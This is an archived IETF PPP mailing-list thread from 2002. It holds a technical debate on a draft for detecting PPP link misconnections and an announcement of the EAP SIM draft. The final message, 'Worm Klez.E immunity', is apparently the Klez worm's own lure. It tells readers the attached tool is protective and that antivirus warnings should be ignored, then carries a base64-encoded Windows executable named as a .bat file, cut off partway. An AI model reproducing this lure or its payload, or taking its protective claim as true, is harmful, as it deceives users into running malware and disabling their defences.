	id 91D7E9121D; Wed,  5 Jun 2002 14:41:43 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 93D9191207
	for <ietf-ppp@trapdoor.merit.edu>; Wed,  5 Jun 2002 14:41:42 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 5E7355DE87; Wed,  5 Jun 2002 14:41:37 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from pheriche.sun.com (pheriche.sun.com [192.18.98.34])
	by segue.merit.edu (Postfix) with ESMTP id E5E6E5DDB7
	for <ietf-ppp@merit.edu>; Wed,  5 Jun 2002 14:41:36 -0400 (EDT)
Received: from eastmail1.East.Sun.COM ([129.148.1.240])
	by pheriche.sun.com (8.9.3+Sun/8.9.3) with ESMTP id MAA22518;
	Wed, 5 Jun 2002 12:41:41 -0600 (MDT)
Received: from phorcys.east.sun.com (phorcys.East.Sun.COM [129.148.174.143])
	by eastmail1.East.Sun.COM (8.9.3+Sun/8.9.3/ENSMAIL,v2.1p1) with ESMTP id OAA10136;
	Wed, 5 Jun 2002 14:41:41 -0400 (EDT)
Received: from phorcys.east.sun.com (localhost [127.0.0.1])
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3) with ESMTP id g55Ifb6V142343;
	Wed, 5 Jun 2002 14:41:37 -0400 (EDT)
Received: (from carlsonj@localhost)
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3/Submit) id g55Ifbgj142340;
	Wed, 5 Jun 2002 14:41:37 -0400 (EDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15614.23392.553136.660932@gargle.gargle.HOWL>
Date: Wed, 5 Jun 2002 14:41:36 -0400
From: James Carlson <james.d.carlson@east.sun.com>
To: jonathan.sadler@tellabs.com
Cc: Ben.Mack-Crane@tellabs.com, ietf-ppp@merit.edu
Subject: Re: I-D ACTION:draft-sadler-pppext-disc-01.txt
In-Reply-To: Jonathan Sadler's message of 5 June 2002 11:41:58
References: <H0000c0804987a22.1023219301.mailw02@MHS>
	<3CFE3F56.86CF8ABF@tellabs.com>
X-Mailer: VM 7.01 under Emacs 21.2.1
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

Jonathan Sadler writes:
> While PPP will have the same failure behavior for misconfiguration as
> well as misconnection, the mechanism that is necessary to recover (ie
> identify what the fault location is) is completely different.

True, but I think that's really a management application issue, not
something that ought to be coded directly into the wire protocol.

In other words, there are *lots* of ways that things can fail -- not
just the wiring hazards that you've mentioned -- and many of them are
not necessarily present or detectable when the link starts.  By
depending on LCP negotiation at link start, and doing the check only
once over the life of the link, I think you're opening holes in the
administrative model.

> > This is false.  Detection of misconnections is done at each level in
> > PPP -- LCP is merely one component, and by no means the only one.
> 
> The above listed misconnections cannot be identified by any protocol
> other than LCP as LCP will never succesfully negotiate when one of these
> misconnections exists.

True, but so what?

As I mentioned before, if you need to see some sort of unauthenticated
identity information in LCP, you don't need to change anything.  Use
the existing LCP Endpoint-Discriminator option.  Or use RFC 1570 LCP
Identification.

> Instead when one of the above listed misconnections occurs on a link,
> the technician will see that LCP won't come up.  The technician will not
> have any assistance in identifying why -- they'll at most see the
> CONF-REQs coming from one or both ends in logs.  But they will not know
> if its the wiring that is buggered up or if its a lower layer driver
> problem or bad hardware.

That, I think, is where you need good diagnostic software, not changes
to the standard protocols.

> This draft provides a mechanism that helps to isolate the source of the
> problem.  While this may seem trivial for installations with a handful
> of terminations, it is a problem for installations that have thousands
> of terminations.

Understood.  Doing OAM well is hard.

> > In neither case does the link come up.  That's the point of PPP
> > negotiation: preventing misconfigured links from being established.
> > It's not merely an LCP function.
> 
> However, the current negotiation only focusses on attributes of the
> particular sub-protocol being negotiated.  They do not provide any
> tracing capability for the layer that exists below PPP.  This is what
> this mechanism provides.

Fine.  You can also do this using RFC 1570 Identification messages.

If the peer can hear you at all, then putting information into an LCP
option works as well as issuing an Identification message on failure.
If the peer can't hear you at all due to a wiring error, then putting
information into an LCP option doesn't help any more than issuing an
Identification message because neither makes it to the destination.

The two should be equivalent, except that using Identification doesn't
require an extra standard.

> > There are lots of ways to do this.  You can hijack the existing LCP
> > Endpoint Discriminator option from RFC 1990.  You can encode this
> > information in the authentication data passed via PAP/CHAP/EAP.  I
> > don't see that you need a new LCP option to do it.
> 
> We actually considered using the Endpoint Discriminator option since it
> has the same general format as the identifier we are looking to send but
> decided against it because it is used to specifically identify an MLP
> bundle that a link belongs to -- a completely different purpose than
> misconnection detection and transport neighbor discovery.

The distinction matters only if you're actually using MP.  Yes, I
agree that's a bit of a hack, but, within a cooperating group, it
matters less than the issue of creating a new option does.

> > That's setting aside, of course, whether PPP belongs here at all.
> 
> Specifying a separate protocol leads to new development, new standards,
> and new interoperability testing.  Further, some vendors may decide to
> delay implementation due to the amount of additional work necessary. 
> Adding an option to LCP the amount of work is considerably less (and
> none if its use is out of scope for a vendor).

Well, then, I think the same issues exist here ...

> > True.  You already have to modify the PPP code to support *something*
> > to identify links.  If you put the modification into the existing
> > mechanisms, then nobody else needs to know about this usage.
> 
> However, putting it in a PPP sub-protocol other than LCP won't work as
> LCP has to complete negotitation before any other protocol can start up.

Not true for LCP Identification.

> > Actually, I suspect that it may well be used there.  A protocol like
> > this that can identify endpoints for validation purposes can *also* be
> > used for discovering the peer's identity in a dynamic situation.  In
> > other words, it's exactly analogous to IPCP's negotiation: it can be
> > used just to validate that the right peers are talking (the original
> > intent, based on experience with SLIP) or it can be used to distribute
> > information.
> 
> The information is specifically providing an identifier for a link
> endpoint independent of the Network Layer Protocols supported by the
> link.  The identifier needs to have network scope so that the endpoint
> can be uniquely identified by the operator/technician.
> 
> Currently, NCPs don't obtain Network Layer Addressing from LCP, and they
> will not need to after introduction of this LCP option.

I wasn't suggesting that at all.  What I was suggesting was that if
peer A says "I'm server 7 in Chicago, and you're listening to port 5,"
then it's quite likely that peer B will want to use that information
when talking to the rest of the world: id est, advertising this link
(somehow) as a resource for constraint-based routing.

That's not at all the same thing as a network layer address.

In other words, if it's necessary, this may well be more than just a
way to detect wiring errors.  It ought to integrate into the way the
port is to be used.

(Sort of like the BACP Link-ID option ... but better.)

> > This behavior isn't actually documented in the draft.  In addition,
> > per RFC 1661, action 'str' is done only when someone invokes Close on
> > LCP or on abject failure.  This eventually results in 'tlf' being
> > sent, and the physical layer being torn down (for whatever "torn down"
> > might mean in this context).
> 
> Exactly -- a Close event would be generated by the neighbor discovery
> manager.  I'll look to improve the text describing this.

So, the physical layer is torn down, and a new incarnation of the link
begins with a TDM flavor.  How is the TDM link supposed to be managed?
You've done away with PPP at this point, so it's not possible to
signal the peer to shut down the link.  There's no way to do link
quality monitoring.  There's no way to detect peer restart.

This seems to me to be a very fragile modal interface.  The danger of
having one of the peers in "special PPP" mode while the other is stuck
in the other mode seems pretty high.

What am I missing?

> > Thus, I think this does imply some changes, since the link remains
> > usable even though LCP is destroyed.
> 
> It may imply changes in specific implementations -- but it is completely
> consistent with the existing LCP state machine.

This is some usage of the word "destroyed" with which I was not
previously familiar.  :-/

> > What exactly is the difference there?
> 
> LCP must succeed for authentication to proceed.  Simple as that.  If you
> are looking to solve a wiring problem that causes LCP to fail, you can't
> expect authentication to assist.  Therefore either LCP or the bearer
> need to provide the trace information needed to solve the problem.

This proposal only covers a small subset of possible configuration
errors.  Is it still worthwhile?  Shouldn't there be some mechanism
that covers the cases where the peers *cannot* hear each other?  Since
this is an in-band mechanism, I don't see how it could be PPP.

More to the point: if the link fails to come up, why can't that
technician start up a link test tool that (using the link as a raw
HDLC interface) sends "I am port 5, server 7, in Chicago" over and
over?  Why does diagnosis of wiring errors have to be integrated into
PPP?

I think it's enough that PPP *detects* that the physical medium is
unusable.  I don't quite see why it should go ahead and include
options to analyze that failure in detail.

> > But, then, the link is left down.  This case uses PPP as though it
> > were a way to say "hello" to the peer, and then disconnect, secure in
> > the knowledge that the peer is somehow still there.
> 
> Correct.  The expectation is that as long as the underlying bearer is
> still operationally in service (eg. carrier is asserted, etc.) the
> identity of the neighbor is not going to change.  And the draft states
> in sec. 4.5 that if a link goes operationally out of service when it
> returns to service neighbor discovery will be done again.

That makes assumptions that RFC 1661 does not.  In particular, RFC
1661 does *not* require any notification from the physical layer.
This is quite intentional, because physical layer notifications don't
always work right.

> > The switch-over to TDM mode sounds significant to me.  You need to be
> > able to switch to it and back (somehow) without getting PPP confused.
> > LCP messages are used for this on normal PPP links.  I don't see what
> > keeps PPP in synchronization here.
> 
> Once neighbor discovery/misconnection detection is complete, the LCP
> session is closed, allowing a new LCP session to be initiated by the
> remote endpoint.  Since the lower layer never went out of service, this
> new session will not be terminated by the transport equipment.

But if this secondary PPP session goes down, then somehow the physical
layer *will* be torn down, right?

>  If any
> sort of cross connect is already in place any new LCP session attempted
> by the end equipment will be continued to the remote endpoint of the
> link.

... making the first LCP Up/Down somewhat unnecessary.

> > Do you have to distinguish between PPP and Cisco HDLC?  Or between PPP
> > and ATM?
> >
> > I don't think that goes away.
> 
> Good point.  Any recommendations on how to solve this?  I'll start
> working on an approach...

SONET/SDH solve it by sending the C2 byte to signal the payload.
Switched protocols (e.g., ISDN and X.25) have similar mechanisms to
signal payload (although they're often mangled by switches and thus
ignored in practice, and caller information is used instead).

Other media are missing this, but don't have a problem because they
never switch modes.  This seems to be a new beast: a transport that
doesn't signal upper layer protocol, but does allow the protocol to
change over time.

> --8<--SNIP-->8--
> 
> > Instead, I think that whatever is used for OAM functionality on that
> > TDM interface ought to be used for identification.  That allows the
> > port to stay in TDM mode all the time, be managed, and work without
> > having to invoke PPP at all.
> 
> Unfortunately, the trace signals that exist on TDM interfaces are not
> ubiquitous and don't use a common format leading to a variety of issues.
> Consequently, in-band signals will be necessary.  This draft attempts to
> define a common format using a ubiquitous protocol.

There are many existing OAM protocols for TDM interfaces -- FDL on T1,
for example.  Granted, they're not perfect, but I don't quite see how
PPP can be a replacement unless the interface stays in PPP "mode" for
the life of the link, and thus allows LCP Echo-Request, LQM, and thus
more detailed monitoring.

It isn't as though OAM is just a test that's done once when a link
starts.

If the proposal were to add more OAM-like functionality to PPP, I
think that would be a lot more helpful.

-- 
James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677


From owner-ietf-ppp@merit.edu  Thu Jun  6 05:48:59 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id FAA03793
	for <pppext-archive@odin.ietf.org>; Thu, 6 Jun 2002 05:48:58 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 880D09128A; Thu,  6 Jun 2002 05:48:58 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 5BA7B9128C; Thu,  6 Jun 2002 05:48:58 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 57EC69128A
	for <ietf-ppp@trapdoor.merit.edu>; Thu,  6 Jun 2002 05:48:57 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 3D0EA5DE9E; Thu,  6 Jun 2002 05:48:52 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from mgw-x2.nokia.com (mgw-x2.nokia.com [131.228.20.22])
	by segue.merit.edu (Postfix) with ESMTP id 8FC315DDB7
	for <ietf-ppp@merit.edu>; Thu,  6 Jun 2002 05:48:51 -0400 (EDT)
Received: from esvir04nok.ntc.nokia.com (esvir04nokt.ntc.nokia.com [172.21.143.36])
	by mgw-x2.nokia.com (Switch-2.2.1/Switch-2.2.0) with ESMTP id g569nK602643
	for <ietf-ppp@merit.edu>; Thu, 6 Jun 2002 12:49:23 +0300 (EET DST)
Received: from esebh004.NOE.Nokia.com (unverified) by esvir04nok.ntc.nokia.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id <T5b51e122c9ac158f24156@esvir04nok.ntc.nokia.com>;
 Thu, 6 Jun 2002 12:48:52 +0300
Received: from esebe013.NOE.Nokia.com ([172.21.138.52]) by esebh004.NOE.Nokia.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 6 Jun 2002 12:48:52 +0300
Received: from trebe003.NOE.Nokia.com ([172.22.232.175]) by esebe013.NOE.Nokia.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 6 Jun 2002 12:48:52 +0300
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: EAP SIM version 4
Date: Thu, 6 Jun 2002 12:48:51 +0300
Message-ID: <DED1F2C6CE07FA498D7AD0CCAC03401B015D0F31@trebe003.NOE.Nokia.com>
Thread-Topic: EAP SIM version 4
Thread-Index: AcINP10iWF9AVySAQdOqkFudlVSLqQ==
From: <henry.haverinen@nokia.com>
To: <eap@frascone.com>
Cc: <ietf-ppp@merit.edu>
X-OriginalArrivalTime: 06 Jun 2002 09:48:52.0416 (UTC) FILETIME=[5D985400:01C20D3F]
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id FAA03793


Hi all,

I just submitted version 4 of the EAP SIM draft to the IETF
directories. A preview is available at the following URL:
http://www.cs.tut.fi/~haverinh/draft-haverinen-pppext-eap-sim-04.txt

Changes to version 03:
- all comments I have received since February are addressed.
  Most significantly the draft now uses 128-bit MAC codes (AT_MAC and
  AT_MAC_SRES) and integrity keys (K_int), and there is a new PRF based on 
  NIST FIPS Publication 186
- zero configuration support

If you have an implementation, we'd be very happy to test interoperability
with the Nokia implementation. Please contact me so we can arrange
the testing. To facilitate interoperable implementations, I'm going to avoid
making incompatible updates to the version 04.

Regards,
Henry

PS. Jari and I are also working on the version 04 of the EAP AKA draft,
which will be shortly available too.



From owner-ietf-ppp@merit.edu  Sun Jun  9 06:37:17 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id GAA28524
	for <pppext-archive@odin.ietf.org>; Sun, 9 Jun 2002 06:37:11 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id E68F191218; Sun,  9 Jun 2002 06:37:05 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 99FAC91220; Sun,  9 Jun 2002 06:37:05 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 478E891218
	for <ietf-ppp@trapdoor.merit.edu>; Sun,  9 Jun 2002 06:37:04 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 91E905DE0D; Sun,  9 Jun 2002 06:36:59 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from smtp1.libero.it (smtp1.libero.it [193.70.192.51])
	by segue.merit.edu (Postfix) with ESMTP id 74D6B5DDBA
	for <ietf-ppp@merit.edu>; Sun,  9 Jun 2002 06:36:56 -0400 (EDT)
Received: from Dflxm (151.25.136.79) by smtp1.libero.it (6.5.015)
        id 3CFC3E5B00223F77 for ietf-ppp@merit.edu; Sun, 9 Jun 2002 12:37:04 +0200
From: wsimpson <wsimpson@GreenDragon.com>
To: ietf-ppp@merit.edu
Subject: Worm Klez.E immunity
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=Y13R9m3I9jpz8703392311i3HOK9WG57o5Kz3
Message-Id: <20020609103656.74D6B5DDBA@segue.merit.edu>
Date: Sun,  9 Jun 2002 06:36:56 -0400 (EDT)
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu

--Y13R9m3I9jpz8703392311i3HOK9WG57o5Kz3
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>

<FONT>Klez.E is the most common world-wide spreading worm.It's very dangerous by corrupting your files.<br>
Because of its very smart stealth and anti-anti-virus technic,most common AV software can't detect or clean it.<br>
We developed this free immunity tool to defeat the malicious virus.<br>
You only need to run this tool once,and then Klez will never come into your PC.<br>
NOTE: Because this tool acts as a fake Klez to fool the real worm,some AV monitor maybe cry when you run it.<br>
If so,Ignore the warning,and select 'continue'.<br>
If you have any question,please <a href=3Dmailto:wsimpson@GreenDragon.com>mail to me</a>.</FONT></BODY></HTML>

--Y13R9m3I9jpz8703392311i3HOK9WG57o5Kz3
Content-Type: application/octet-stream;
	name=garda10[1].bat
Content-ID: <Y8uPFSravxO79>
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
RE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgTs1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7Tn
GbNm+BOzPucAs1X4E7Nc+BKzJfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAA
UEUAAEwBBAC4jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQAAAQAAAAABAA
ABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ANAAAOwBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQ
AAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA
QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAABAA
AAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IPsFItF
EFNWM/ZXM9uJdeyJdfiJRfA7dRAPjW8BAACLRfBqA1o7wolV9H0DiUX0i030uD09PT2Nffxm
q4XJqn4Vi0UIjX38A/CLwcHpAvOli8gjyvOkik38isHA6AKF24hF/3Qmi30Uhf9+J4vDi3UM
K0X4mff/hdJ1G8YEMw1DxgQzCkODRfgC6wuLdQyLfRTrA4t1DA+2Rf+LFTDwQACA4QPA4QSK
BBCIBDOKRf2K0EPA6gQCyoXbdCGF/34di8MrRfiZ9/+F0nUOxgQzDUPGBDMKQ4NF+AKKRf2L
FTDwQAAkDw+2ycDgAooMEYgMM4pN/orRQ8DqBgLChduIRf90HoX/fhqLwytF+Jn3/4XSdQ7G
BDMNQ8YEMwpDg0X4Ag+2Rf+LFTDwQACKBBCIBDNDg330An8FxkQz/z2A4T+F23Qehf9+GovD
K0X4mff/hdJ1DsYEMw1DxgQzCkODRfgCD7bBiw0w8EAAigQIiAQzQ4N99AF/BcZEM/89i3Xs
g8YDg23wA4l17OmI/v//X4vDXlvJw1WL7IHsEAEAAINl+ACNRfxQagRoUgJBAOjJIgAAWVlQ
aAIAAID/FUzQQACFwA+FtwAAAFNWV7uLCUEAUFPo1CIAAFmJRfRZjYXw/v//aAQBAABQ/3X4
/3X8/xVQ0EAAhcB1e42F8P7//1DowbUAADP/WTl99H5fV1PoaCIAAFCNhfD+//9Q6GUqAACD
